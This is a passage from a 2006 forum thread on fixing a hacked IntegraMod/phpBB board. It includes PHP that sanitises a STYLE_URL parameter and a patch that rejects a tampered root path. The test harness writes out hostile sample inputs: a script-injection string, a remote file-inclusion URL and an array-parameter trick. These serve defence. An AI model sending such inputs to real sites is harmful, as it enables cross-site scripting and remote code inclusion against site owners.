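// (int) on a non-numeric string such as "<script>" or a URL yields 0,
// which is why the cast removes the injection; the range check keeps 0
// and negative ids away from setup_style(). The is_array() test matters
// because (int) array('x') is 1, so ?STYLE_URL[]=x would otherwise pass.
function style_id_from_request($post, $get)
{
    $raw = isset($post['STYLE_URL']) ? $post['STYLE_URL']
         : (isset($get['STYLE_URL']) ? $get['STYLE_URL'] : null);
    if ($raw === null || is_array($raw)) {
        return 0;
    }
    $id = (int) $raw;            // no urldecode(): PHP already decoded the request
    return ($id > 0) ? $id : 0;
}

// Stand-in for the real setup_style(): knows theme ids 1, 2 and 3. (constructed)
function setup_style($style_id)
{
    return in_array($style_id, array(1, 2, 3), true) ? array('id' => $style_id) : false;
}

// Constructed requests: one legitimate, then the shapes seen in the thread
// (script injection, remote path) and the array trick.
$requests = array(
    array('STYLE_URL' => '2'),
    array('STYLE_URL' => '<script>alert(1)</script>'),
    array('STYLE_URL' => 'http://yoursite.com/cmd.txt?'),
    array('STYLE_URL' => array('x')),
    array('STYLE_URL' => '99'),
);
foreach ($requests as $get) {
    $style_id = style_id_from_request(array(), $get);
    $theme    = ($style_id > 0) ? setup_style($style_id) : false;
    printf("%-32s -> id=%d %s\n",
           is_array($get['STYLE_URL']) ? 'STYLE_URL[]=x' : $get['STYLE_URL'],
           $style_id, $theme ? 'theme applied, cookie set' : 'ignored');
    // In the real block the cookie is only written after setup_style() succeeds,
    // and the value written is the integer, never the raw request string:
    // setcookie($board_config['cookie_name'] . '_style', (string) $style_id, ...);
}
```

The last sample (id 99) shows the second half of the check: an integer that is not a known theme is ignored rather than echoed back in an error message, which is the path the advisory's cross-site scripting description refers to.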

PostPosted: Sun Aug 27, 2006 9:41 pm
Author: Fubie
yes my forum was hacked but not the rc3 file. it's fine and I checked the file hash and it matches.

I have removed my forum until an answer is found so that I don't endanger my hosting service.

Re: IntegraMod Hack fix

PostPosted: Sun Aug 27, 2006 11:53 pm
Author: Michaelo
Please edit your functions.php adding the following code to the start... Should be line 22

Code in this post has been updated... See first post in this thread

Code: Select all
// Belt //
if (strstr($phpbb_root_path, '"'))
{
    die('Hacking attempt... Details Logged'); exit;
}
// Braces //
// accept only a path that begins with "./" or "../"
if (!($phpbb_root_path[0] == '.' && ($phpbb_root_path[1] == '/' || $phpbb_root_path[1] == '.')))
{
    $phpbb_root_path = './';
    die('Hacking attempt... Details Logged'); exit;
}


This will fix the second hack using functions.php and phpbb_root_path, I may have gone overboard but who cares <img>

Many thanks to pggar for all the testing on this one...

Note with this fix you do not need register_globals off, but to be honest they should be OFF as they will disappear in PHP 6

Mike

PostPosted: Mon Aug 28, 2006 12:02 am
Author: gcomfx.com
This last one gave me this:

Parse error: syntax error, unexpected T_STRING in /forum/includes/functions.php on line 25

PostPosted: Mon Aug 28, 2006 1:04 am
Author: Michaelo
Think I had a typo... try it now <img>

PostPosted: Mon Aug 28, 2006 2:55 am
Author: Unregistered
hi, after i reinstalled the forum from my backup, the site seems to be very slow.. any idea why?

Re: IntegraMod Hack fix

PostPosted: Mon Aug 28, 2006 3:57 am
Author: Unknown Ranger
"Michaelo";p="14281" wrote:Please edit your functions.php adding the following code to the start... Should be line 22
Code: Select all
// Belt //
if (strstr($phpbb_root_path, '"'))
{
    die('Hacking attempt... Details Logged'); exit;
}
// Braces //
// accept only a path that begins with "./" or "../"
if (!($phpbb_root_path[0] == '.' && ($phpbb_root_path[1] == '/' || $phpbb_root_path[1] == '.')))
{
    $phpbb_root_path = './';
    die('Hacking attempt... Details Logged'); exit;
}


This will fix the second hack using functions.php and phpbb_root_path, I may have gone overboard but who cares <img>

Many thanks to pggar for all the testing on this one...

Note with this fix you do not need register_globals off, but to be honest they should be OFF as they will disappear in PHP 6

Mike


This latest fix blocks me out of my main photo album. Putting back original functions.php allows me back in. All other posted fixes are applied without issues.

PostPosted: Mon Aug 28, 2006 4:01 am
Author: Michaelo
"Unregistered";p="14290" wrote:hi, after i reinstalled the forum from my backup, the site seems to be very slow.. any idea why?


The cache has to be rebuilt but don't forget to check for any suspicious files...

PostPosted: Mon Aug 28, 2006 4:02 am
Author: Michaelo
"Unknown Ranger";p="14293" wrote:
"Michaelo";p="14281" wrote:Please edit your functions.php adding the following code to the start... Should be line 22
Code: Select all
// Belt //
if (strstr($phpbb_root_path, '"'))
{
    die('Hacking attempt... Details Logged'); exit;
}
// Braces //
// accept only a path that begins with "./" or "../"
if (!($phpbb_root_path[0] == '.' && ($phpbb_root_path[1] == '/' || $phpbb_root_path[1] == '.')))
{
    $phpbb_root_path = './';
    die('Hacking attempt... Details Logged'); exit;
}


This will fix the second hack using functions.php and phpbb_root_path, I may have gone overboard but who cares ;) Might take a little time as I don't have the old album installed...